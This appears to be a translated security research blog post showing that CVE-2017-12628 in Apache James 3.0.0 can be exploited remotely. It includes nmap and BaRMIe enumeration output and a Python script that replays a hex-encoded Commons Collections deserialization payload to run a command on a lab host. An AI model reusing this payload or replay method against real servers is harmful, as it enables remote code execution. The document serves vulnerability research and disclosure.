导语:今天早上,我发现了一条提到“Apache James 3.0.1 JMX服务器反序列化”漏洞的推文 ,漏洞编号是CVE-2017-12628,这引起了我的注意,因为我之前写过一个通用的JMX反序列化漏洞利用方式,它包含在我的RMI攻击工具 —— BaRMIe中

今天早上,我发现了一条提到“Apache James 3.0.1 JMX服务器反序列化”漏洞的推文 ,漏洞编号是CVE-2017-12628,这引起了我的注意,因为我之前写过一个通用的JMX反序列化漏洞利用方式,它包含在我的RMI攻击工具 —— BaRMIe中。通过快速搜索可以了解CVE-2017-12628的更多详细信息,在  安全性公告中声明了该漏洞只能用于本地特权升级,并提及升级到的库版本信息。

这极大的引起了我的兴趣,因为JMX使用了RMI,并且RMI对象可以远程访问,即使它们绑定到了本地主机,因为Java将对象引用绑定到了“0.0.0.0”。BaRMIe利用本地端口转发来攻击绑定到本地或内部IP地址的对象。

漏洞分析

我在一个虚拟机中来运行Apache James 3.0.0(3.0.1修复了这个问题),而我注意到的第一件事就是 “libscommons-collections-3.2.1.jar” 文件。我们可以使用ysoserial来生成一个使用该库的POP小工具链,以便能够通过反序列化实现任意的命令执行。

我通过运行“bin/run.sh”来启动James服务器,然后在VM上执行netstat,并且在宿主主机上运行nmap,发现在VM上有一个侦听外部的Java RMI端口。

C:ToolsNmap>nmap.exe -sV --version-all -p33148,46299 192.168.174.40
 
Starting Nmap 7.31 ( https://nmap.org ) at 2017-10-22 12:37 GMT Daylight Time
Nmap scan report for 192.168.174.40
Host is up (0.00076s latency).
PORT      STATE SERVICE     VERSION
33148/tcp open  rmiregistry Java RMI
46299/tcp open  tcpwrapped

使用BaRMIe枚举此服务后,表明它是RMI对象服务而不是RMI注册服务,因此BaRMIe无法远程攻击该服务。

C:ToolsBaRMIe>java -jar BaRMIe.jar 192.168.174.40 33148
Scanning 1 target(s) for objects exposed via an RMI registry...
192.168.174.40:33148 appears to be an RMI object endpoint, rather than a registry.

在VM上本地运行nmap显示Apache James RMI注册服务绑定到了127.0.0.1:9999。我将BaRMIe复制到虚拟机来枚举这个RMI注册服务,发现外部的RMI服务实际上是JMX对象的RMI对象服务。

RMI Registry at 127.0.0.1:9999
Objects exposed: 1
Object 1
  Name: jmxrmi
  Endpoint: 127.0.1.1:33148
  Classes: 3
    Class 1
      Classname: javax.management.remote.rmi.RMIServerImpl_Stub

使用BaRMIe的攻击模式与通用JMX漏洞和Commons Collections 3.2.1有效载荷,可以利用此服务执行任意命令,导致本地权限升级。除此之外,还值得注意的是,如果服务器使用过时的Java运行时环境(<= 6u131,7u121或8u112),那么它也容易受到ysoserial RMI注册漏洞的攻击。

远程利用

安全发布公告说明了这只是一个本地特权升级漏洞,但是鉴于JMX对象是在外部暴露出来的,所以我认为这一定是可以远程利用的。

在我继续远程利用之前,我想说明这个漏洞是可以远程利用的,但是远程攻击涉及到基于网络的暴力攻击。

为了快速实现概念证明,我在虚拟机上使用tcpdump来捕获到JMX对象服务的流量,同时运行BaRMIe JMX漏洞利用工具执行命令“touch fooobaaar”。

sudo tcpdump -i lo -w apache-james-jmx-exploit.pcap port 33148

回到我的宿主主机上,我使用了一个快速而肮脏的Python脚本来重放exploit数据包。

import socket
 
packets = [
       "4a524d4900024b",
       "RECV",
       "00093132372e302e312e310000000050aced000577220000000000000002000000000000000000000000000000000001f6b6898d8bf28643757200185b4c6a6176612e726d692e7365727665722e4f626a49443b871300b8d02c647e02000070787000000001737200156a6176612e726d692e7365727665722e4f626a4944a75efa128ddce55c0200024a00066f626a4e756d4c000573706163657400154c6a6176612f726d692f7365727665722f5549443b7078709c4cdbcfdd205cf8737200136a6176612e726d692e7365727665722e5549440f12700dbf364f12020003530005636f756e744a000474696d65490006756e6971756570787080020000015f4347bba08304129e77088000000000000015737200126a6176612e726d692e6467632e4c65617365b0b5e2660c4adc340200024a000576616c75654c0004766d69647400134c6a6176612f726d692f6467632f564d49443b70787000000000000927c0737200116a6176612e726d692e6467632e564d4944f8865bafa4a56db60200025b0004616464727400025b424c000375696471007e0003707870757200025b42acf317f8060854e002000070787000000008beccd729e295d7ea7371007e000580010000015f43592e64224416a1",
       "RECV",
 "50aced000577229c4cdbcfdd205cf88304129e0000015f4347bba08002fffffffff0e074eaad0caea8737200116a6176612e7574696c2e48617368536574ba44859596b8b734030000707870770c000000000010000000000001737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a6563743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b707870740001417372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b7078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b7078707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d8341899020000707870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e0003707870767200116a6176612e6c616e672e52756e74696d6500000000000000000000007078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b707870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c0200007078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a99020000707870000000007400096765744d6574686f647571007e001b00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb3420200007078707671007e001b7371007e00137571007e001800000002707571007e001800000000740006696e766f6b657571007e001b00000002767200106a6176612e6c616e672e4f626a65637400000000000000000000007078707671007e00187371007e0013757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b470200007078700000000174000f746f75636820666f6f6f6261616172740004657865637571007e001b0000000171007e00207371007e000f737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c756570787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b02000070787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c64707870000000010000000077080000001000000000787878",
       "RECV",
]
 
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("192.168.174.40", 33148))
 
for packet in packets:
       if packet == "RECV":
              sock.recv(4096)
       else:
              sock.sendall(packet.decode("hex"))
sock.close()

从我的主机进行远程重放,可以成功的发起攻击,证明远程攻击的确是可以实现的。

ApacheJamesJMXRemoteRoot.gif

不过,我怀疑,在重新启动Apache James服务后,这个快速而肮脏的PoC不再奏效。我生成了更多的捕获到的数据包来进行比较,并进行了一些进一步的测试,似乎可以降低漏洞利用的第三个出站数据包的一些差异。以下是该数据包的前27个字节:

50aced00057722 9c4cdbcfdd205cf8 8304129e 0000015f43 47bba0

以蓝色突出显示的部分(47bba0)是动态变化的,但是它们的值可以从服务器先前返回的响应数据包中提取出来。以橙色突出显示的部分(9c4cdbcfdd205cf8 )是当服务器启动时生成的RMI对象标识符。这个值来自RMI注册服务,它仅在服务器本地进行侦听。如果攻击者可以强制或以其他方式获取到这个8字节的值,那么远程命令执行漏洞就可能实现了。

源链接

Hacking more

...